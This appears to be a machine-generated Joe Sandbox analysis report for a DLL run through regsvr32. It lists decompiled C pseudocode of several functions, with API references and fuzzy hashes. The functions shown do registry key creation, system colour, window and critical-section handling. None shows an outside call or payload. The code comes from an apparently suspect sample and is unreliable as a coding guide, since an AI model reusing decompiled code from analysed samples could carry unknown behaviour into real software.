                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LongWindow$MessageSend_memset
                                                                                                        • String ID: (
                                                                                                        • API String ID: 2997958587-3887548279
                                                                                                        • Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                        • Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
                                                                                                        • Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
                                                                                                        • Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10013E40(intOrPtr __ecx) {
                                                                                                        				void* _v8;
                                                                                                        				void* _v12;
                                                                                                        				void* _v16;
                                                                                                        				int _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _t32;
                                                                                                        
                                                                                                        				_t32 = __ecx;
                                                                                                        				_v24 = __ecx;
                                                                                                        				_v16 = 0;
                                                                                                        				_v8 = 0;
                                                                                                        				_v12 = 0;
                                                                                                        				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
                                                                                                        					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
                                                                                                        				}
                                                                                                        				if(_v8 != 0) {
                                                                                                        					RegCloseKey(_v8);
                                                                                                        				}
                                                                                                        				if(_v12 != 0) {
                                                                                                        					RegCloseKey(_v12);
                                                                                                        				}
                                                                                                        				return _v16;
                                                                                                        			}









                                                                                                        0x10013e5b
                                                                                                        0x10013e62
                                                                                                        0x10013e65
                                                                                                        0x10013e68
                                                                                                        0x10013e6b
                                                                                                        0x10013e76
                                                                                                        0x10013ead
                                                                                                        0x10013ead
                                                                                                        0x10013eb8
                                                                                                        0x10013ebd
                                                                                                        0x10013ebd
                                                                                                        0x10013ec2
                                                                                                        0x10013ec7
                                                                                                        0x10013ec7
                                                                                                        0x10013ed0

                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10013EBD
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 10013EC7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreate$Open
                                                                                                        • String ID: software
                                                                                                        • API String ID: 1740278721-2010147023
                                                                                                        • Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                        • Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
                                                                                                        • Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
                                                                                                        • Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 84%
                                                                                                        			E10013CEE(void* __ecx, long* __edi, void* __esi) {
                                                                                                        				long _t22;
                                                                                                        				void* _t23;
                                                                                                        				void* _t28;
                                                                                                        				void* _t31;
                                                                                                        				void* _t33;
                                                                                                        				signed int _t35;
                                                                                                        				long* _t40;
                                                                                                        				void* _t41;
                                                                                                        				void* _t42;
                                                                                                        
                                                                                                        				_t41 = __esi;
                                                                                                        				_t40 = __edi;
                                                                                                        				_t31 = __ecx;
                                                                                                        				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
                                                                                                        				E10017C83(0, 0);
                                                                                                        				_t22 = E100134F9(_t31, 0, __edi[3], 4);
                                                                                                        				_t33 = 2;
                                                                                                        				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
                                                                                                        				_t46 = _t23;
                                                                                                        				if(_t23 == 0) {
                                                                                                        					LeaveCriticalSection( *(_t42 - 0x14));
                                                                                                        					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
                                                                                                        				}
                                                                                                        				 *(_t41 + 0xc) = _t23;
                                                                                                        				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
                                                                                                        				 *(_t41 + 8) = _t40[3];
                                                                                                        				TlsSetValue( *_t40, _t41);
                                                                                                        				_t35 =  *(_t42 + 8);
                                                                                                        				_t28 =  *(_t41 + 0xc);
                                                                                                        				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
                                                                                                        					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
                                                                                                        				}
                                                                                                        				_push( *(_t42 - 0x14));
                                                                                                        				LeaveCriticalSection();
                                                                                                        				return E10017C60(_t28);
                                                                                                        			}












                                                                                                        0x10013cee
                                                                                                        0x10013cee
                                                                                                        0x10013cee
                                                                                                        0x10013cf5
                                                                                                        0x10013cff
                                                                                                        0x10013d0b
                                                                                                        0x10013d11
                                                                                                        0x10013d16
                                                                                                        0x10013d1c
                                                                                                        0x10013d1e
                                                                                                        0x10013d23
                                                                                                        0x10013d29
                                                                                                        0x10013d29
                                                                                                        0x10013d31
                                                                                                        0x10013d42
                                                                                                        0x10013d4e
                                                                                                        0x10013d53
                                                                                                        0x10013d59
                                                                                                        0x10013d5c
                                                                                                        0x10013d61
                                                                                                        0x10013d6b
                                                                                                        0x10013d6b
                                                                                                        0x10013d6e
                                                                                                        0x10013d74
                                                                                                        0x10013d7f

                                                                                                        APIs
                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 10013CFF
                                                                                                          • Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3
                                                                                                        • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23
                                                                                                          • Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB
                                                                                                        • _memset.LIBCMT ref: 10013D42
                                                                                                        • TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
                                                                                                        • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                                                                                                        • String ID:
                                                                                                        • API String ID: 356813703-0
                                                                                                        • Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                        • Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
                                                                                                        • Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
                                                                                                        • Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10013810(void* __ecx) {
                                                                                                        				struct HBRUSH__* _t14;
                                                                                                        				void* _t18;
                                                                                                        
                                                                                                        				_t18 = __ecx;
                                                                                                        				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
                                                                                                        				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
                                                                                                        				_t14 = GetSysColorBrush(6);
                                                                                                        				 *(_t18 + 0x20) = _t14;
                                                                                                        				return _t14;
                                                                                                        			}





                                                                                                        0x1001381a
                                                                                                        0x10013820
                                                                                                        0x10013827
                                                                                                        0x1001382e
                                                                                                        0x10013835
                                                                                                        0x10013842
                                                                                                        0x10013849
                                                                                                        0x1001384c
                                                                                                        0x1001384f
                                                                                                        0x10013853

                                                                                                        APIs
                                                                                                        • GetSysColor.USER32(0000000F), ref: 1001381C
                                                                                                        • GetSysColor.USER32(00000010), ref: 10013823
                                                                                                        • GetSysColor.USER32(00000014), ref: 1001382A
                                                                                                        • GetSysColor.USER32(00000012), ref: 10013831
                                                                                                        • GetSysColor.USER32(00000006), ref: 10013838
                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 10013845
                                                                                                        • GetSysColorBrush.USER32(00000006), ref: 1001384C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Color$Brush
                                                                                                        • String ID:
                                                                                                        • API String ID: 2798902688-0
                                                                                                        • Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                        • Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
                                                                                                        • Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
                                                                                                        • Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10028DE5() {
                                                                                                        				long _t5;
                                                                                                        				int _t6;
                                                                                                        
                                                                                                        				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
                                                                                                        					_t5 = GetVersion();
                                                                                                        					if((0x80000000 & _t5) != 0) {
                                                                                                        						L5:
                                                                                                        						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
                                                                                                        						return _t5;
                                                                                                        					}
                                                                                                        					_t5 = GetVersion();
                                                                                                        					if(_t5 != 3) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					goto L4;
                                                                                                        				} else {
                                                                                                        					L4:
                                                                                                        					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
                                                                                                        					 *0x1005acc4 = _t6;
                                                                                                        					return _t6;
                                                                                                        				}
                                                                                                        			}





                                                                                                        0x10028df6
                                                                                                        0x10028e00
                                                                                                        0x10028e04
                                                                                                        0x10028e20
                                                                                                        0x10028e20
                                                                                                        0x00000000
                                                                                                        0x10028e20
                                                                                                        0x10028e06
                                                                                                        0x10028e0c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x10028e0e
                                                                                                        0x10028e0e
                                                                                                        0x10028e13
                                                                                                        0x10028e19
                                                                                                        0x00000000
                                                                                                        0x10028e19

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Version$MessageRegisterWindow
                                                                                                        • String ID: MSWHEEL_ROLLMSG
                                                                                                        • API String ID: 303823969-2485103130
                                                                                                        • Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                        • Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
                                                                                                        • Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
                                                                                                        • Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 81%
                                                                                                        			E1000C209(void* __ecx, void* __edx, void* __eflags) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				void* __ebp;
                                                                                                        				signed int _t37;
                                                                                                        				signed int _t54;
                                                                                                        				intOrPtr _t57;
                                                                                                        				long _t60;
                                                                                                        				struct HWND__* _t63;
                                                                                                        				CHAR* _t64;
                                                                                                        				void* _t65;
                                                                                                        				void* _t67;
                                                                                                        				void* _t71;
                                                                                                        				void* _t72;
                                                                                                        				long _t73;
                                                                                                        				void* _t74;
                                                                                                        				void* _t75;
                                                                                                        				signed int _t77;
                                                                                                        				void* _t78;
                                                                                                        				signed int _t79;
                                                                                                        				void* _t81;
                                                                                                        
                                                                                                        				_t71 = __edx;
                                                                                                        				_t79 = _t81 - 0x9c;
                                                                                                        				_t37 =  *0x10057a08; // 0xe6b5ff6d
                                                                                                        				 *(_t79 + 0x98) = _t37 ^ _t79;
                                                                                                        				_t73 =  *(_t79 + 0xa4);
                                                                                                        				_t77 = 0;
                                                                                                        				 *((intOrPtr*)(_t79 - 0x80)) =  *((intOrPtr*)(_t79 + 0xa8));
                                                                                                        				E1000C12A(0);
                                                                                                        				_t67 = _t72;
                                                                                                        				_t63 = E1000C15E(0, _t79 - 0x70);
                                                                                                        				 *(_t79 - 0x7c) = _t63;
                                                                                                        				if(_t63 !=  *(_t79 - 0x70)) {
                                                                                                        					EnableWindow(_t63, 1);
                                                                                                        				}
                                                                                                        				 *(_t79 - 0x78) =  *(_t79 - 0x78) & _t77;
                                                                                                        				GetWindowThreadProcessId(_t63, _t79 - 0x78);
                                                                                                        				if(_t63 == 0 ||  *(_t79 - 0x78) != GetCurrentProcessId()) {
                                                                                                        					L6:
                                                                                                        					__eflags = _t73;
                                                                                                        					if(__eflags != 0) {
                                                                                                        						_t77 = _t73 + 0x78;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				} else {
                                                                                                        					_t60 = SendMessageA(_t63, 0x376, 0, 0);
                                                                                                        					if(_t60 == 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_t77 = _t60;
                                                                                                        						L8:
                                                                                                        						 *(_t79 - 0x74) =  *(_t79 - 0x74) & 0x00000000;
                                                                                                        						if(_t77 != 0) {
                                                                                                        							 *(_t79 - 0x74) =  *_t77;
                                                                                                        							_t57 =  *((intOrPtr*)(_t79 + 0xb0));
                                                                                                        							if(_t57 != 0) {
                                                                                                        								 *_t77 = _t57 + 0x30000;
                                                                                                        							}
                                                                                                        						}
                                                                                                        						if(( *(_t79 + 0xac) & 0x000000f0) == 0) {
                                                                                                        							_t54 =  *(_t79 + 0xac) & 0x0000000f;
                                                                                                        							if(_t54 <= 1) {
                                                                                                        								_t24 = _t79 + 0xac;
                                                                                                        								 *_t24 =  *(_t79 + 0xac) | 0x00000030;
                                                                                                        								__eflags =  *_t24;
                                                                                                        							} else {
                                                                                                        								if(_t54 + 0xfffffffd <= 1) {
                                                                                                        									 *(_t79 + 0xac) =  *(_t79 + 0xac) | 0x00000020;
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t96 = _t73;
                                                                                                        						 *(_t79 - 0x6c) = 0;
                                                                                                        						if(_t73 == 0) {
                                                                                                        							_t64 = _t79 - 0x6c;
                                                                                                        							_t73 = 0x104;
                                                                                                        							__eflags = GetModuleFileNameA(0, _t64, 0x104) - 0x104;
                                                                                                        							if(__eflags == 0) {
                                                                                                        								 *((char*)(_t79 + 0x97)) = 0;
                                                                                                        							}
                                                                                                        						} else {
                                                                                                        							_t64 =  *(_t73 + 0x50);
                                                                                                        						}
                                                                                                        						_push( *(_t79 + 0xac));
                                                                                                        						_push(_t64);
                                                                                                        						_push( *((intOrPtr*)(_t79 - 0x80)));
                                                                                                        						_push( *(_t79 - 0x7c));
                                                                                                        						_t74 = E1000C093(_t64, _t67, _t73, _t77, _t96);
                                                                                                        						if(_t77 != 0) {
                                                                                                        							 *_t77 =  *(_t79 - 0x74);
                                                                                                        						}
                                                                                                        						if( *(_t79 - 0x70) != 0) {
                                                                                                        							EnableWindow( *(_t79 - 0x70), 1);
                                                                                                        						}
                                                                                                        						E1000C12A(1);
                                                                                                        						_pop(_t75);
                                                                                                        						_pop(_t78);
                                                                                                        						_pop(_t65);
                                                                                                        						return E100167D5(_t74, _t65,  *(_t79 + 0x98) ^ _t79, _t71, _t75, _t78);
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}
























                                                                                                        0x1000c209
                                                                                                        0x1000c20a
                                                                                                        0x1000c217
                                                                                                        0x1000c21e
                                                                                                        0x1000c22d
                                                                                                        0x1000c233
                                                                                                        0x1000c236
                                                                                                        0x1000c239
                                                                                                        0x1000c23e
                                                                                                        0x1000c249
                                                                                                        0x1000c24e
                                                                                                        0x1000c251
                                                                                                        0x1000c256
                                                                                                        0x1000c256
                                                                                                        0x1000c25c
                                                                                                        0x1000c264
                                                                                                        0x1000c26c
                                                                                                        0x1000c291
                                                                                                        0x1000c291
                                                                                                        0x1000c293
                                                                                                        0x1000c295
                                                                                                        0x1000c295
                                                                                                        0x00000000
                                                                                                        0x1000c279
                                                                                                        0x1000c283
                                                                                                        0x1000c28b
                                                                                                        0x00000000
                                                                                                        0x1000c28d
                                                                                                        0x1000c28d
                                                                                                        0x1000c298
                                                                                                        0x1000c298
                                                                                                        0x1000c29e
                                                                                                        0x1000c2a2
                                                                                                        0x1000c2a5
                                                                                                        0x1000c2ad
                                                                                                        0x1000c2b4
                                                                                                        0x1000c2b4
                                                                                                        0x1000c2ad
                                                                                                        0x1000c2bd
                                                                                                        0x1000c2c5
                                                                                                        0x1000c2cb
                                                                                                        0x1000c2de
                                                                                                        0x1000c2de
                                                                                                        0x1000c2de
                                                                                                        0x1000c2cd
                                                                                                        0x1000c2d3
                                                                                                        0x1000c2d5
                                                                                                        0x1000c2d5
                                                                                                        0x1000c2d3
                                                                                                        0x1000c2cb
                                                                                                        0x1000c2e5
                                                                                                        0x1000c2e7
                                                                                                        0x1000c2eb
                                                                                                        0x1000c2f2
                                                                                                        0x1000c2f5
                                                                                                        0x1000c306
                                                                                                        0x1000c308
                                                                                                        0x1000c30a
                                                                                                        0x1000c30a
                                                                                                        0x1000c2ed
                                                                                                        0x1000c2ed
                                                                                                        0x1000c2ed
                                                                                                        0x1000c311
                                                                                                        0x1000c317
                                                                                                        0x1000c318
                                                                                                        0x1000c31b
                                                                                                        0x1000c328
                                                                                                        0x1000c32a
                                                                                                        0x1000c32f
                                                                                                        0x1000c32f
                                                                                                        0x1000c335
                                                                                                        0x1000c33c
                                                                                                        0x1000c33c
                                                                                                        0x1000c344
                                                                                                        0x1000c352
                                                                                                        0x1000c353
                                                                                                        0x1000c356
                                                                                                        0x1000c363
                                                                                                        0x1000c363
                                                                                                        0x1000c28b

                                                                                                        APIs
                                                                                                          • Part of subcall function 1000C15E: GetParent.USER32(100014EC), ref: 1000C1B1
                                                                                                          • Part of subcall function 1000C15E: GetLastActivePopup.USER32(100014EC), ref: 1000C1C0
                                                                                                          • Part of subcall function 1000C15E: IsWindowEnabled.USER32(100014EC), ref: 1000C1D5
                                                                                                          • Part of subcall function 1000C15E: EnableWindow.USER32(100014EC,00000000), ref: 1000C1E8
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000C256
                                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 1000C264
                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 1000C26E
                                                                                                        • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 1000C283
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1000C300
                                                                                                        • EnableWindow.USER32(?,00000001), ref: 1000C33C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.303760085.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.303755479.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303779838.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303789852.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303808490.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303813956.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000002.00000002.303817812.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 1877664794-0
                                                                                                        • Opcode ID: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                        • Instruction ID: 906afa4fd5bad6b09c7d7bb12576003d117f5a582180c2333a3862cf80afbe79
                                                                                                        • Opcode Fuzzy Hash: d475a19da1505cd8c491af7de1dd181a650697f179afdcdb5f27c752af681c02
                                                                                                        • Instruction Fuzzy Hash: A1416A32A0035C9FFB31CFA58C85FDD7BA8EF05390F210129E949AB286D7709A408B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1000C15E(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                        				struct HWND__* _t7;
                                                                                                        				void* _t13;
                                                                                                        				struct HWND__** _t15;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				struct HWND__* _t18;
                                                                                                        
                                                                                                        				_t18 = _a4;
                                                                                                        				_t17 = _t18;
                                                                                                        				if(_t18 != 0) {
                                                                                                        					L5:
                                                                                                        					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                        						L8:
                                                                                                        						_t16 = _t17;
                                                                                                        						_t7 = _t17;
                                                                                                        						if(_t17 == 0) {
                                                                                                        							L10:
                                                                                                        							if(_t18 == 0 && _t17 != 0) {
                                                                                                        								_t17 = GetLastActivePopup(_t17);
                                                                                                        							}
                                                                                                        							_t15 = _a8;
                                                                                                        							if(_t15 != 0) {
                                                                                                        								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                        									 *_t15 =  *_t15 & 0x00000000;
                                                                                                        								} else {
                                                                                                        									 *_t15 = _t16;
                                                                                                        									EnableWindow(_t16, 0);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							return _t17;
                                                                                                        						} else {
                                                                                                        							goto L9;
                                                                                                        						}
                                                                                                        						do {
                                                                                                        							L9:
                                                                                                        							_t16 = _t7;
                                                                                                        							_t7 = GetParent(_t7);
                                                                                                        						} while (_t7 != 0);
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        					_t17 = GetParent(_t17);
                                                                                                        					L7:
                                                                                                        					if(_t17 != 0) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				}
                                                                                                        				_t13 = E1000C087();
                                                                                                        				if(_t13 != 0) {
                                                                                                        					L4:
                                                                                                        					_t17 =  *(_t13 + 0x20);
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				_t13 = E1000A7CE();
                                                                                                        				if(_t13 != 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				_t17 = 0;
                                                                                                        				goto L8;
                                                                                                        			}









                                                                                                        0x1000c166
                                                                                                        0x1000c16e
                                                                                                        0x1000c170
                                                                                                        0x1000c18d
                                                                                                        0x1000c19b
                                                                                                        0x1000c1a6
                                                                                                        0x1000c1a8
                                                                                                        0x1000c1aa
                                                                                                        0x1000c1ac
                                                                                                        0x1000c1b7
                                                                                                        0x1000c1b9
                                                                                                        0x1000c1c6
                                                                                                        0x1000c1c6
                                                                                                        0x1000c1c8
                                                                                                        0x1000c1ce
                                                                                                        0x1000c1d2
                                                                                                        0x1000c1f0
                                                                                                        0x1000c1e3
                                                                                                        0x1000c1e6
                                                                                                        0x1000c1e8
                                                                                                        0x1000c1e8
                                                                                                        0x1000c1d2
                                                                                                        0x1000c1f9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c1ae
                                                                                                        0x1000c1ae
                                                                                                        0x1000c1af
                                                                                                        0x1000c1b1
                                                                                                        0x1000c1b3
                                                                                                        0x00000000
                                                                                                        0x1000c1ae
                                                                                                        0x1000c1a0
                                                                                                        0x1000c1a2
                                                                                                        0x1000c1a4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c1a4
                                                                                                        0x1000c172
                                                                                                        0x1000c179
                                                                                                        0x1000c188
                                                                                                        0x1000c188
                                                                                                        0x00000000
                                                                                                        0x1000c188
                                                                                                        0x1000c17b
                                                                                                        0x1000c182
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1000c184
                                                                                                        0x00000000

